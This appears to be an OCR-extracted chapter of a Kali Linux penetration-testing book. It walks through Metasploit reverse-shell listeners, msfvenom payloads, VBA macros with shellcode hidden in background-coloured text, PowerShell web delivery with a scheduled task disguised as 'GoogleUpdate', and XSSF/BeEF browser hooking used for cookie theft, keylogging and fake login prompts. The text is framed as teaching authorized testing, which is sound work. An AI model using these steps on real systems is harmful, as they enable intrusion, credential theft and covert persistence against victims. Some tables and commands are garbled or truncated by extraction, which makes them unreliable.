After everything is successfully completed, the attackers will set up their systems to listen for any connections. During a penetration testing, it may not be feasible to write everything again about what payload, callback IP address, port number, and back-grounding a session without exiting the Metasploit console. This can be configured by a simple metasploit script by following the below steps.

1. Create a file with the following lines of Metasploit-specific commands; in our case, we call the file named Listen:

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp

```
set LHOST 192.168.0.24
set LPORT 443
set ExitOnSession false
exploit -j -z
```

- 2. Once the script is created, just run the script file using the following command in the Terminal:
- msfconsole -q -r nameofyourfile
- 3. Once the victim opens the executable, a reverse shell will be spawned at the attacker's console, as shown in the following screenshot:



4. Once the system establishes a successful Meterpreter session, attackers can establish full access to the system by connecting to the session by typing

sessions -i 1.



Although it is *sessions* -*i* 1 here, the number might change according to how many targets open your executable and establish a reverse shell session to the attacker.

Attacking a system using hostile scripts

Client-side scripts, such as JavaScript, VBScript, and PowerShell, were developed to move the application logic and actions from the server to the client's computer. From an attacker's or tester's perspective, there are several advantages of using these scripts, as follows:

- The majority of the .com websites use one or the other JavaScript—with jQuery being one of them—as major deployments across the globe.
- They're already part of the target's natural operating environment; the attacker does not have to transfer large compilers or other helper files such as encryption applications to the target system.
- Scripting languages are designed to facilitate computer operations such as configuration management and system administration. For example, they can be used to discover and alter system configurations, access the registry, execute programs, access network services and databases, and move binary files via HTTP or email. Such standard scripted operations can be readily adopted for use by testers.
- Because they are native to the operating system environment, they do not usually trigger antivirus alerts.
- They are easy to use, since writing a script requires a simple text editor. There are no barriers to using scripts in order to launch an attack.

Historically, JavaScript was the scripting language of choice to launch attacks due to its widespread availability on most target systems. Because JavaScript attacks have been well characterized, we'll focus on how Kali facilitates attacks using newer scripting languages—VBScript and PowerShell.

Conducting attacks using VBScript

Visual Basic Scripting (VBScript) edition is an **Active Scripting language** developed by Microsoft. It was designed to be a lightweight, Windows-native language that could execute small programs. VBScript has been installed by default on every desktop release of Microsoft Windows since Windows 98, making it an excellent target for client-side attacks. In August 2018, a well-known **advanced persistent threat (APT)** named DarkHotel (Dark Seoul malware) utilized the VBScript engine in Microsoft Windows, which exploited the specific vulnerability in Internet Explorer 11.0.

To launch an attack using VBScript, we'll use msfvenom from the command line:

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.0.24

Note that -r designates that the output will be a file that is VBA executable. The output will appear as a text file with two specific parts, as shown in the following screenshot:



To use the script, open a Microsoft Office document and create a macro (the specific command will depend on the version of Microsoft Windows in use). Copy the first part of the text given in the following information box (from sub Auto_Open() to the final End Sub statement) into the macro editor and save it with

macros enabled:

Next, copy the shellcode into the actual document. A partial excerpt of the shellcode is shown in the following screenshot:



The shellcode is recognizable as a script that may be used to perform an attack, so you may wish to hide or otherwise obfuscate the shellcode by minimizing the font size and match the color to the document's background.

The attacker must set up a listener on Metasploit. After entering msfconsole at command prompt, the attacker will typically enter the following commands and set the options for host, port, and payload; in addition, the attacker will configure the connection to automatically migrate to the more stable explorer.exe process, as shown in the following lines of command:

```
use exploit/multi/handler
set lhost 192.168.43.130
set lport 4444
set payload windows/meterpreter/reverse_tcp
set autorunscript migrate -n explorer.exe
exploit
```

Add the preceding lines into a file, call it vbexploit.rc, and run the following command:

```
msfconsole -q -r vbexploit.rc
```

When the file is sent to the target, it will launch a pop-up security warning when it is opened; therefore, attackers will use social engineering to force the intended victim to select the Enable option. One of the most common methods to do this is to embed the macro in a Microsoft Word document or Excel Spreadsheet that has been configured to play a game.

Launching the document will create a reverse TCP shell back to the attacker, allowing the attacker to ensure a persistent connection with the target and conduct post exploit activities.

To extend this attack methodology, we can convert any executable to VBScript using msf-exe2vba directly from the command line or exe2vba located at /usr/share/metasploit-framework/tools/exploit/.

In this example, we will use the same .exe that we created; for example, first create a backdoor using the Metasploit framework. Note that X designates that the backdoor will be created as an executable (attack.exe), as shown in the following screenshot:

```
root@kali: # msfvenom --platform windows -p windows/meterpreter/reverse_tcp
T=192.168.0.124 LPORT=8080 -f vba-exe > attack.exe
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 333 bytes
Final size of vba-exe file: 20254 bytes
```

Next, execute exe2.vba to convert the executable to VBScript using the following command and ensure that the correct pathnames are used:

```
root@kali:/usr/share/metasploit-framework/tools/exploit# ruby exe2vba.rb ~/attack.exeatt
[*] Converted 20254 bytes of EXE into a VBA script
```

This will allow the executable to be placed in a Microsoft macro-enabled document and sent to a client. VBScript can be used to execute the reverse shell and to alter the system registry in order to ensure that the shell remains persistent. We have found attacks of this type to be one of the most effective ways to bypass network security controls and maintain a connection to a secured network.

From an attacker's perspective, there are some significant advantages of using exploits based on VBScript (which used to be a powerful tool). However, it is now rapidly replaced by powerful scripting language, PowerShell.

Attacking systems using Windows PowerShell

Windows PowerShell is a command-line shell and scripting language intended to be used for system administration. Based on the .NET framework, it extends the capabilities that were available in VBScript. The language itself is quite extensible. Since it is built on .NET libraries, you can incorporate code from languages such as C# or VB.NET. You can also take advantage of third-party libraries. In spite of this extensibility, it is a concise language. VBScripts that require more than 100 lines of code can be reduced to as little as 10 lines of PowerShell!

Perhaps, the best feature of PowerShell is that it is available by default on most modern Windows-based operating systems (Windows 7 and higher versions) and cannot be removed.

To launch the attack, we will use the PowerShell Payload Web Delivery module of the Metasploit framework. The purpose of this module is to rapidly establish a session on the target system. The attack does not write to the disk, so it is less likely to trigger detection by the client-side antivirus. Launching the attack and the available module options are shown in the following screenshot:

| Namo | Current Setting | Required | Tescription |
|--------------------------------------|--------------------|-----------------------|--|
| SEVHOST | 0.0.0.0 | уел | The local host to listen on. This must be an address on the |
| SRVPORT SSL SSLCert URIPATH | 8080 false | yea no no no | The local port to listen on. Negotiate SSL for incoming connections Fath to a custom SSL certificate (default is randomly gene: The URI to use for this exploit (default is random) |
| yload opt | ions (windows/mete | irpreter/r | averse http): |
| Name | Current Setting | Required | Description |
| EXITFUNC | process | yes | Exit technique (Accepted: "', seh, thread, process, none) |

Before the attack is completed, the attacker must prepare a listener for the incoming shell. URIPATH was randomly generated by Metasploit; make sure that the correct URIPATH is set for the listener. The following simple script to create a listener are as follows:

```
use exploit/multi/script/web_delivery
set SRVHOST <your IP>
set target 2
set payload windows/meterpreter/reverse_http
set LHOST <your IP>
set URIPATH boom
set payload
exploit
```

The Metasploit framework will generate a one-line Python script that can be embedded or run on the target as shown in the following screenshot:



A successful attack will create an interactive limited shell on the attacker's system.



It is possible to make ${\tt web_delivery}$ persistent using the ${\tt schtask}$ command.

The following command will create a scheduled task, GoogleUpdate, which will implement powershell.exe (by default, located in the Windows\system32 directory) at logon:

```
|schtasks /ru "SYSTEM" /create /tn GoogleUpdate /tr "powershell -windowstyle hidden -nolo
```

Additional PowerShell scripts designed to support post exploit activities can be found in Kali's <code>PowerSploit</code> directory. In spite of the flexibility of PowerShell, it has some disadvantages.

For example, if the document containing the macro is closed by the end user before a persistence mechanism can be applied, the connection is lost.

More importantly, scripts such as VBScript and PowerShell are only useful against Microsoft environments. To extend the reach of client-side attacks, we need to look for a common client-side vulnerability that can be exploited regardless of its operating system environment. One particular example of such a vulnerability is cross-site scripting.

The Cross-Site Scripting framework

Cross-Site Scripting (XSS) vulnerabilities are the most reportedly exploitable vulnerabilities found in websites. It is estimated that they are present in nature due to lack of input data sanitization.

An XSS attack involves three parties: an attacker, a victim, and a vulnerable website or web application. The attack hinges on the fact that the vulnerable website has a script that returns user input in an HTML page without first sanitizing that input. This allows the attacker to input JavaScript code, which is executed by the victim's browser. As a result, it is possible to form links to the vulnerable site where one of the parameters consists of malicious JavaScript code. The JavaScript code will be executed by the victim's browser in the vulnerable website's context, granting the attacker access to the victim's cookies for the vulnerable website.

There are at least two primary types of XSS vulnerabilities: nonpersistent and persistent.

The most common type is nonpersistent or reflected vulnerabilities. These occur when the data provided by the client is used immediately by the server to display a response. An attack of this vulnerability can occur via email or a third-party website providing a URL that appears to reference a trusted website but contains the XSS attack code. If the trusted site is vulnerable to this particular attack, executing the link can cause the victim's browser to execute a hostile script that may lead to a compromise.

Persistent (stored) XSS vulnerabilities occur when the data provided by the attacker is saved by the server and then is permanently displayed on trusted web pages to other users during the course of their browsing. This commonly occurs with online message boards and blogs that allow users to post HTML-formatted messages. An attacker can place a hostile script on the web page that is not visible to incoming users, but which compromises visitors who access the affected pages.

Several tools exist on Kali Linux to find XSS vulnerabilities, including xsser

and various vulnerability scanners. However, there are some tools that allow a tester to fully exploit an XSS vulnerability, demonstrating the gravity of the weakness.

The **Cross-Site Scripting Framework** (**XSSF**) is a multiplatform security tool that exploits XSS vulnerabilities to create a communication channel with the target, supporting attack modules that include the following:

- Conducting reconnaissance of a target browser (fingerprinting and previously visited URLs), the target host (detecting virtual machines, getting system info, registry keys, and wireless keys), and the internal network.
- Sending an alert message popup to the target. This simple attack can be used to demonstrate the XSS vulnerability; however, more complex alerts can mimic logon prompts and capture user authentication credentials.
- Stealing cookies that enable an attacker to impersonate the target.
- Redirecting the target to view a different web page. A hostile web page may automatically download an exploit onto the target system.
- Loading PDF files or Java applets onto the target, or stealing data such as SD card contents from Android mobile devices.
- Launching Metasploit attacks, including browser_autopwn, as well as denial-of-service attacks.
- Launching social engineering attacks, including autocomplete theft, clickjacking, Clippy, fake flash updates, phishing, and tabnabbing.

In addition, the **XSSF Tunnel** function allows an attacker to impersonate the victim and browse websites using their credentials and session. This can be an effective method to access an internal corporate intranet.

To use XSSF, it must be installed and configured to support an attack using the following steps:

- Download the tool from: https://github.com/PacktPublishing/Mastering-Kali-Linuxfor-Advanced-Penetration-Testing-Third-Edition/blob/master/Chapter%2008/XSSF-3.0.zip.
- 2. Unzip the download file by issuing the unzip XSSF-3.0 command.
- 3. Using file explorer, move all the folders inside XSSF-3.0 to /usr/share/metasploit-framework/.
- 4. Make sure you don't replace the files and folders. You must select Merge as shown in the following screenshot:

| Cancel | Merge Folder | Merge | Skip |
|--------|---|-------------------|-------------|
| | Merge folder "modules"? | | |
| | A newer folder with the same name already exists in "metaspiolt-framework". Merging will ask for confirmation before replacing any files in the folder that conflict | with the files be | ing copied. |
| | Original folder Items: 7 Items Last modified: 07:07 | | |
| | Merge with Items: 1 Item Last modified: 19 Mar 2013 | | |
| | Select a new name for the destination | | |
| | Apply this action to all files and folders | | |

5. From the Metasploit framework console, load the XSSF plugin using load xssf and followed by the xssf_urls command, as shown in the following screenshot:

```
nsf > load xssf
[-] Your Ruby version is 2.3.1. Make sure your version is up-to-date with the la
st non-vulnerable version before using XSSF!
8888 d8' d8P' 'Y8 d8P' 'Y8 888'
                                              8
  Y886..8F Y88bo. Y68bo. 888
 8888' 'Y8888c, 'Y8888c, 86800008
.897868, 'Y88b 'Y86b 868 "
d8' 888b oo .d89 oo .d89 898
o8860 0888880 8""888888P' 8""88888P' o8880 Cross-Site Scripting Framework 3.0
                                          Ludovic Courgnaud - CONIX Securi
ty
[+] Please use command 'xssf urls' to see useful XSSF URLs
[*] Successfully loaded plugin: xssf
msf > xssf urls
[+] XSSF Server : 'http://192.168.213.128:8888/'
                                                                   or 'http://<PUBLIC-IP>:8888/'
[+] Generic XSS injection: 'http://192.168.213.128:8888/loop' or 'http://<PUBLIC-IF>:8888/loop'
[+] XSSF test page : 'http://192.168.213.128:8888/test.html' or 'http://<FUBLIC-IF>:8888/test.html'
[+] XSSF Tunnel Proxy : 'localhost:8889'
[+] XSSF logs page : 'http://localhost:8889/gui.html?guipage=main'
[+] XSSF statistics page: 'http://localhost:8889/gui.html?guipage=stats'
[+] XSST help page : 'http://localhost:8889/gui.html?guipage=help'
```

6. We'll use the vulnerable web application, **Mutillidae**, to demonstrate the XSSF. Once Mutillidae is opened, navigate to the blog page as shown in the following screenshot:

| OWASP 2013 | A1 - Injection (SQL) | | - | 11. | |
|---------------|--|---|---------------------------|-----|---------------------|
| OWASP 2010 | A1 - Injection (Other) | | | US | er Lookup (SQL) |
| OWASP 2007 | A2 - Broken Authentication and Session Management | • | Help Me! | | |
| Web Services | A3 - Cross Site Scripting (XSS) | • | Reflected (First Order) | • | |
| HTML 5 | A4 - Insecure Direct Object References | , | Persistent (Second Order) |) | Add to your blog |
| | | | DOM-Based | • | View someone's blog |
| Others | A5 - Security Misconfiguration | • | Via "Input" (GET/POST) | • | Show Log |
| Documentation | A6 - Sensitive Data Exposure | • | Via HTTP Headers | | |
| | A7 - Missing Function Level Access | | | | |

- 7. To launch the attack against the target client, do not enter a regular posting into the blog. Instead, enter script elements that contain the target URL and port:
- <script src="http://<ip>:8888/loop?interval=5"></script>
- 8. The following screenshot shows the placement of the attack code on the target website's blog page:



When this is entered and the victim clicks on Save Blog Entry, their system will be compromised. From the Metasploit framework console, the tester can get information about each victim using the xssf_victimsand xssf_information commands. On executing the xssf_victims command, information about each victim is displayed, as shown in the following screenshot:

```
[*] Use xssf information [VictimID] to see more information about a victim
msf > xssf information 1
INFORMATION ABOUT VICTIM 1
IP ADDRESS : 192.168.213.1
ACTIVE ? : FALSE
FIRST REQUEST : 2017-04-26 07:13:01
LAST REQUEST
              : 2017-04-26 07:14:17
CONNECTION TIME : Ohr 1min 16sec
BROWSER NAME : Google Chrome
BROWSER VERSION : 57.0.2987.133
OS NAME : Windows
OS VERSION
              : Unknown
ARCHITECTURE : ARCH_X86_64
LOCATION
              : http://192.168.213.128:8888
XSSF COOKIE ? : YES
RUNNING ATTACK : NONE
WAITING ATTACKS : 0
```

The XSSF includes 33 different auxiliaries in Metasploit specific to the browser, operating system, and devices as shown in the following screenshot. This allows the attackers to perform variety of attack based on the victim:

| mer > search user | | | | |
|---|-----------------|----------|-------|--------------------------------------|
| Matching Modules | | | | |
| | | | | |
| Vice | bisclosure bate | Hank | Check | Description |
| | | | | and the set of the second set of the |
| auxiliary/assf/public/android/steal sdcard file | | normal. | 345 | ANDROID SDCARD FILE STEALS |
| auxiliary/sssf/public/chrome/filejacking | | normal. | No | Filedacking |
| sumiliary/xssf/public/elastix/Elastix FEX voip call | | normal | No | Elastix FEX VolF Call |
| auxiliary/xssf/public/ie/command | | normal | 340 | COMMAND XSSF (IE Only) |
| suziliary/xssf/public/iphone/skype call | | normal | No | Skype Call |
| sumiliary/assf/public/misc/alert | | normal | 340 | ALERT X56F |
| sumiliary/assf/public/misc/change interval | | normal. | 340 | interval changer |
| sugiliary/ggsf/public/misc/check connected | | normal | Mp: | CHECK CONNECCED |
| auxiliary/assf/public/misc/cookie | | normal. | 310 | Cookie getter |
| sumiliary/wssf/public/misc/carf | | notmal. | No. | Cross-Site Request Forgery |
| auxiliary/sssf/public/misc/detect properties | | normal | 36 | Properties detecter |
| muxiliary/wssf/public/misc/get page | | normal. | 360 | MebSage Saver |
| sumiliary/masf/public/misc/load applet | | normal | No | Java applet loader |
| sumiliary/assf/public/misc/load pdf | | normal | 140 | FOF loader |
| augiliagy/xssf/public/misc/logkeys | | noursal. | No: | SEY LOWIER |
| sugiliary/sast/public/misc/prompt | | normal. | No | PROMPT XOOF |
| auxiliary/mssf/public/misc/redirect | | normal | Mo. | REDIRECT |
| sumiliary/west/public/misc/save page | | nomal | No | SiebSage Saver |
| auxiliary/spaf/public/misc/tabnapping | | normal | No. | Browser Tabs Changer |
| auxiliary/assf/public/misc/visited pages | | normal | die . | Visited links finder |
| sumiliary/manf/public/misc/webcan capture | | normal | 340 | Webcan Capture |
| auxiliary/assf/public/misc/ass get bousce | | normal | Mo. | ESS BOUNCE |

The most common XSS attack at this point is to send a brief and relatively innocuous message or alert to the client. Using the Metasploit framework, this can be achieved relatively simply by entering the following commands:

```
msf> use auxiliary/xssf/public/misc/alert
msf auxiliary(alert) > show options
```

After reviewing the options, an alert can be rapidly sent from the command line, as shown in the following screenshot:



Generally, most testers and their clients validate cross-site scripting using such simple alert messages. This proves that a vulnerability exists.

However, simple alerts lack emotional impact. Frequently, they identify a real vulnerability, but the client does not respond and mediate the vulnerability because alert messages are not perceived to be a significant threat. Fortunately, XSSF allows testers to up the ante and demonstrate more sophisticated and dangerous attacks.

XSSF can be used to steal cookies, act as a keylogger, perform **Cross site request forgery** (**CSRF**), redirection attacks, and also capture webcam pictures if the victim has one. However, similar attacks can be achieved by BeEF.

The Browser Exploitation Framework (BeEF)

BeEF is an exploitation tool that focuses on a specific client-side application, the webbrowser.BeEF allows an attacker to inject a JavaScript code into a vulnerable HTML code using an attack such as XSS or SQL injection. This exploit code is known as **hook**. A compromise is achieved when the hook is executed by the browser. The browser (**zombie**) connects back to the BeEF application, which serves JavaScript commands or modules to the browser.

BeEF's modules perform tasks such as the following:

• Fingerprinting and the reconnaissance of compromised browsers. It can also be used as a platform to assess the presence of exploits and their behavior under different browsers.



Note that BeEF allows us to hook multiple browsers on the same client, as well as multiple clients across a domain, and then manage them during the exploitation and post exploitation phases.

- Fingerprinting the target host, including the presence of virtual machines.
- Detecting software on the client (Internet Explorer only) and obtaining a list of the directories in the Program Files and Program Files (x86) directories. This may identify other applications that can be exploited to consolidate our hold on the client.
- Taking photos using the compromised system's webcam; these photos have a significant impact in reports.
- Conducting searches of the victim's data files and stealing data that may contain authentication credentials (clipboard content and browser cookies) or other useful information.
- Implementing browser keystroke logging.
- Conducting network reconnaissance using ping sweeps and fingerprint network appliances and scanning for open ports.
- Launching attacks from the Metasploit framework.
- Using the tunneling proxy extension to attack the internal network using the security authority of the compromised web browser.

Because BeEF is written in Ruby, it supports multiple operating systems (Linux, Windows, and macOS). More importantly, it is easy to customize new modules in BeEF and extend its functionality.

Configuring the BeEF

BeEF is installed by default in Kali distribution. It is located in the /usr/share/beef-xss/ directory. By default, it is not integrated with the Metasploit framework. To integrate BeEF, you will need to perform the following steps:

1. Edit the main configuration file located at /usr/share/beef-xss/config.yaml to read the following:

```
metasploit:
enable:true
```

2. Edit the file located at /usr/share/beef-xss/extensions/metasploit/config.yml. You need to edit the host, callback_host, and os 'custom', path lines to include your IP address and the location for the Metasploit framework. A correctly edited config.yml file is shown in the following screenshot:

```
extension:
   metasploit:
        name: 'Metasploit'
        enable: true
        host: "192.168.213.128"
        port: 55552
        user: "msf"
        pass: "abc123"
        uri: '/api'
        # if you need "ssl: true" make sure you start msfrpcd with "SSL=y", like:
        # load msgrpc ServerHost=IP Pass=abc123 SSL=y
        ssl: false
        ssl version: 'TLSvl'
        ssl verify: true
        callback host: "127.0.0.1"
        autopwn url: "autopwn"
        auto msfrpcd: false
        auto msfrpcd timeout: 120
        msf path: [
          (os: 'osx', path: '/opt/local/msf/'),
          {os: 'livecd', path: '/opt/metasploit-framework/'},
          (os: 'bt5r3', path: '/opt/metasploit/msf3/'),
          (os: 'bt5', path: '/opt/framework3/msf3/'),
          (os: 'backbox', path: '/opt/backbox/msf/'),
          (os: 'kali', path: '/usr/share/metasploit-framework/'),
          (os: 'pentoo', path: '/usr/lib/metasploit'),
(os: 'win', path: 'c:\\metasploit-framework\\'),
          {os: 'custom', path: ''}
```

3. Start msfconsole, and load the msgrpc module, as shown in the following screenshot. Make sure that you include the password as well:



4. Start BeEF using the following commands:

```
root@kali:~# cd /usr/share/beef-xss/
root@kali:/usr/share/beef-xss/~# ./beef
```

5. Confirm startup by reviewing the messages generated during program launch. They should indicate that Successful connection with Metasploit occurred, which will be accompanied with an indication that Metasploit exploits have been loaded. A successful program launch is shown in the following screenshot:

| root@Kali:/us | r/share/beef-xss# ./beef |
|----------------|---|
| [1:38:18] | Bind socket [imapeudoral] listening on [0.0.0.0:2000]. |
| [1:38:18] | Browser Exploitation Framework (BeEF) 0.4.7.0-alpha |
| [1:38:18] | Twit: @beefproject |
| [1:38:18] | Site: http://beefproject.com |
| [1:38:18] | Blog: http://blog.beefproject.com |
| [1:38:18] | Wiki: https://github.com/beefproject/beef/wiki |
| [1:38:18] | Project Creator: Wade Alcorn (@WadeAlcorn) |
| [1:38:18] | BeEF is loading. Wait a few seconds |
| [1:38:22] | 12 extensions enabled. |
| [1:38:22] | 254 modules enabled. |
| [1:38:22] | 2 network interfaces were detected. |
| [1:38:22] [+] | running on network interface: 127.0.0.1 |
| [1:38:22] | Hook URL: http://127.0.0.1:3000/hook.js |
| [1:38:22] | UI URL: http://127.0.0.1:3000/ui/panel |
| [1:38:22][+] | running on network interface: 192.168.213.128 |
| [1:38:22] | Hook URL: http://192.168.213.128:3000/hook.js |
| [1:38:22] | UI URL: http://192.168.213.128:3000/ui/panel |
| [1:38:22] | RESTful API key: f35be85102c3e617dca3d42cca1307086ccb0496 |
| [1:38:22] | HTTP Proxy: http://127.0.0.1:6789 |
| [1:38:22] | BeEF server started (press control+c to stop) |
| TATI | |

TP

When you restart BeEF, use the -x switch to reset the database.

In this example, the BeEF server is running on 192.168.213.128 and the hook URL (the one that we want the target to activate) is 192.168.213.128:3000/hook.js.

Most of the administration and management of BeEF is done via the web interface. To access the control panel, go to http://<IP Address>:3000/ui/panel.

The default login credentials are username:beef and Password:beef, as shown in the following screenshot, unless these were changed in config.yaml:



Understanding BeEF Browser

When the BeEF control panel is launched, it will present the Getting Started screen, featuring links to the online site as well as the demonstration pages that can be used to validate the various attacks. The BeEF control panel is shown in the following screenshot:



If you have hooked a victim, the interface will be divided into two panels:

- On the left-hand side of the panel, we have Hooked Browsers; the tester can see every connected browser listed with information about its host operating system, browser type, IP address, and installed plugins. Because BeEF sets a cookie to identify victims, it can refer back to this information and maintain a consistent list of victims.
- The right-hand side of the panel is where all of the actions are initiated and the results are obtained. In the Commands tab, we see a categorized repository of the different attack vectors that can be used against hooked browsers. This view will differ based on the type and version of each browser.
BeEF uses a color-coding scheme to characterize the commands on the basis of their usability against a particular target. The colors used are as follows:

- **Green**: This indicates that the command module works against the target and should be invisible to the victim.
- **Orange**: This indicates that the command module works against the target, but it may be detected by the victim.
- **Gray**: This indicates that the command module is not yet verified against the target.
- **Red**: This indicates that the command module does not work against the target. It can be used, but its success is not guaranteed, and its use may be detected by the target.

Take these indicators with a grain of salt, since variations in the client environment can make some commands ineffective, or may cause other unintended results.

To start an attack or hook a victim, we need to get the user to click on the hook URL, which takes the form of <ip Address>:<port>/hook.js. This can be achieved using a variety of means, including:

- The original XSS vulnerabilities
- Man-in-the-middle attacks (especially the ones using BeEF Shank, an ARP spoofing tool that specifically targets intranet sites on internal networks)
- Social engineering attacks, including the BeEF web cloner and mass emailer, custom hook point with iFrame impersonation, or the QR code generator

Once the browser has been hooked, it is referred to as a zombie. Select the IP address of the zombie from the Hooked Browsers panel on the left-hand side of the command interface and then refer to the available commands.

In the example shown in the following screenshot, there are several different attacks and management options available for the hooked browser. One of the easiest attack options to use is the social engineering Clippy attack.

When Clippy is selected from Module Tree under Commands, a specific Clippy panel is launched on the far right, as shown in the following screenshot. It allows you to adjust the image, the text delivered, and the executable that will be launched locally if the victim clicks on the supplied link. By default, the custom text informs the victim that their browser is out of date, offers to update it for them, downloads an executable (nonmalicious), and then thanks the user for performing the upgrade. All of these options can be changed by the tester:



When Clippy is executed, the victim will see a message, as shown in the following screenshot, on their browser:

| 4 | 1 | C |
|---|----|---|
| N | 10 | 0 |

() 192.168.213.128:3000/demos/basic.html

🖿 📴 🖸

☆

You should be hooked into BeEF.

Have fun while your browser is working against you.

These links are for demonstrating the "Get Page HREFs" command module

- <u>The Browser Exploitation Framework Project homepage</u>
- ha.ckers.org homepage
- <u>Slashdot</u>

Have a go at the event logger. Insert your secret here:

You can also load up a more advanced demo page here



This can be a very effective social engineering attack. When testing with clients, we have had success rates (the client downloaded a nonmalicious indicator file) of approximately 70 percent.

One of the more interesting attacks is Pretty Theft, which asks users for their username and password for popular sites. For example, the Pretty Theft option for Facebook can be configured by the tester, as shown in the following screenshot:

| Asis the user for their username and | password using a floating div. | ŝ. |
|--------------------------------------|---|--|
| 10 | | |
| Facebook | * | |
| Grey | ~ | |
| http://0.0.0.0:3000/ui/media/in | nages/beef.png | |
| | 10 Facebook Grey http://0.0.0.0:3000/ui/media/in | 10 Facebook Grey http://0.0.0.0:3000/ui/media/images/beef.png |

When the attack is executed, the victim is presented with a pop up that appears to be legitimate, as shown in the following screenshot:

| r session has | timed out due to in | nactivity. |
|----------------|---------------------|----------------------|
| ase re-enter y | our username and | d password to login. |
| Email: | | |
| Password: | | |

In BeEF, the tester reviews the history log for the attack and can derive the username and password from the data field in the Command results column, as shown in the following screenshot:

| Module Results History | | Cor | Command results | | |
|------------------------|------------------|-----------|-----------------|--|--|
| id 🔺 | date | label | 1 | data: answar-victim5787@amail.com/Latmainl@1 | |
| 0 | 2017-04-26 10:52 | command 1 | | data. answer-vicunsror (ggmail.com.cemeinig) | |

Another attack that can be quickly launched is old-fashioned phishing; once the browser is hooked to BeEF, it's fairly simple to redirect the users to an attacker-controlled website.

Integrating BeEF and Metasploit attacks

Both BeEF and the Metasploit framework were developed using Ruby and can operate together to exploit a target. Because it uses client-side and server-side fingerprinting to characterize a target, browser_autopwn is one of the most successful attacks.

Once the target has been hooked, start the Metasploit console and configure the attack using the following script:

```
use auxiliary/server/browser_autopwn
setLHOST 192.168.213.128
set PAYLOAD_WIN32
set PAYLOAD_JAVA
exploit
msfconsole -q -r beefexploit.rc
```

Wait until all of the relevant exploits have finished loading. In the example shown in the following screenshot, 20 exploits are loaded. Note the target URL for the attack as well. In this example, the target URL is

http://192.168.213.128:8080/Bo4QcxfS1Nty:



There are several methods to direct a browser to click on a targeted URL;

however, if we have already hooked the target browser, we can use BeEF's redirect function. In the BeEF control panel, go to Browser | Hooked Domain | Redirect Browser. When prompted, use this module to point to the target URL and then execute the attack.

In the Metasploit console, you will see the selected attacks being successively launched against the target. A successful attack will open a Meterpreter session.

Using BeEF as a tunneling proxy

Tunneling is the process of encapsulating a payload protocol inside a delivery protocol, such as IP. Using tunneling, you can transmit incompatible protocols across a network, or you can bypass firewalls that are configured to block a particular protocol. BeEF can be configured to act as a tunneling proxy that mimics a reverse HTTP proxy—the browser session becomes the tunnel and the hooked browser is the exit point. This configuration is extremely useful when an internal network has been compromised, because the tunneling proxy can be used to do the following:

- 1. Browse authenticated sites in the security context (client-side SSL certificates, authentication cookies, NTLM hashes, and so on) of the victim's browser
- 2. Spider the hooked domain using the security context of the victim's browser
- 3. Facilitate the use of tools such as SQL injection

To use the tunneling proxy, select the hooked browser that you wish to target and right-click on its IP address. In the pop-up box, as shown in the following screenshot, select the Use as Proxy option:



Configure a browser to use the BeEF tunneling proxy as an HTTP proxy. By default, the address of the proxy is 127.0.0.1 and the port is 6789.

If you visit a targeted website using the browser configured as the HTTP proxy, all raw request/response pairs will be stored in the BeEF database, which can be analyzed by navigating to Rider | History. An excerpt of the log is shown in the

following screenshot:

| Getting Started | Cu | Current Browser | | | |
|-----------------|-------------------|-----------------|---------|--------|---------|
| Details Logs | Commands Rider Xs | sRays Ipec | Network | WebRTC | |
| History Forge | Request Proxy | | | | |
| Proto | Domain | Port | Method | | Path |
| | www.bindshell.net | 80 | GET | | / |
| | 192.168.213.1 | 80 | GET | | /vijay/ |
| | 192.168.213.1 | 80 | GET | | 1 |

Once an attack has been completed, there are some mechanisms to ensure that a persistent connection is retained, including the following:

- **Confirm close**: This is a module that presents the victim with a Confirm Navigation are you sure you want to leave this page popup when they try to close a tab. If the user elects to Leave this Page, it will not be effective, and the Confirm Navigation popup will continue to present itself.
- **Pop-under module**: This is configured to autorun in config.yaml. This module attempts to open a small pop-under window to keep the browser hooked if the victim closes the main browser tab. This may be blocked by pop-up blockers.
- **iFrame keylogger:** This facilitates rewrites of all of the links on a web page to an *iframe* overlay that is 100 percent of the height and width of the original. For maximum effectiveness, it should be attached to a JavaScript keylogger. Ideally, you would load the login page of the hooked domain.
- **Man-in-the-browser**: This module ensures that whenever the victim clicks on any link, the next page will be hooked as well. The only way to avoid this behavior is to type a new address in the address bar.

Finally, although BeEF provides an excellent series of modules to perform the reconnaissance, as well as the exploit and post exploit phases of the kill chain, the known default activities of BeEF (/hook.js and server headers) are being used to detect attacks, reducing its effectiveness. Testers will have to obfuscate their attacks using techniques such as Base64 encoding, whitespace encoding, randomizing variables, and removing comments to ensure full effectiveness in the future.

Summary

In this chapter, we examined the attacks against systems that are generally isolated from protected networks. These client-side attacks focus on the vulnerabilities in specific applications. We learned how to create a backdoor in any executable and also reviewed hostile scripts, especially VBScript and PowerShell, which are particularly useful in testing and compromising Windows-based networks. We then examined the Cross-Site Scripting framework for new versions of Metasploit in Kali, which can compromise XSS vulnerabilities, as well as the BeEF tool, which targets the vulnerabilities in a web browser. Both XSSF and BeEF integrate with reconnaissance, exploitation, and post exploitation tools on Kali to provide comprehensive attack platforms.

In the next chapter, we will focus more on how to bypass **Network Access Control (NAC)** and antivirus, **User Account Control (UAC)**, and Windows operation system controls. We will also explore toolsets such as Veil Framework and Shellter.

Bypassing Security Controls

2018 was an excellent year for most advanced next-generation antivirus and **Endpoint Detection and Response (EDR)** tools due to the various types of security incidents, especially the sophisticated malwares. Having said that, most of the time when testers get root or internal network access, they think they are done with the test, assuming that they have the knowledge and toolset to completely compromise the network or enterprise.

One of the neglected aspects during a penetration test activity is bypassing security controls to assess the target organization's prevention and detection techniques. In all penetration testing activities, penetration testers or attackers need to understand, what renders the exploit ineffective while performing an active attack on the target network /system and bypassing the security controls that are set by the target organization becomes crucial as part of the kill chain methodology. In this chapter, we will review the different types of security controls in place, identify a systematic process for overcoming these controls, and demonstrate this using the tools from the Kali toolset.

In this chapter, you will learn about the following:

- Bypassing network access control
- Bypassing **antivirus (AV)** using different frameworks
- Bypassing application-level controls
- Bypassing Windows-specific operation system security controls

Bypassing Network Access Control (NAC)

NAC works on a basic form of the 802.1X IEEE standard. The majority of corporations implement NAC to protect network nodes such as switches, routers, firewalls, servers, and, more importantly, endpoints. A decent NAC implies the controls that are put in place to prevent the intrusion by policies and also define who can access what. In this section, we will take a deep dive into different types of NAC that attackers or penetration testers encounter during an RTE or penetration test.

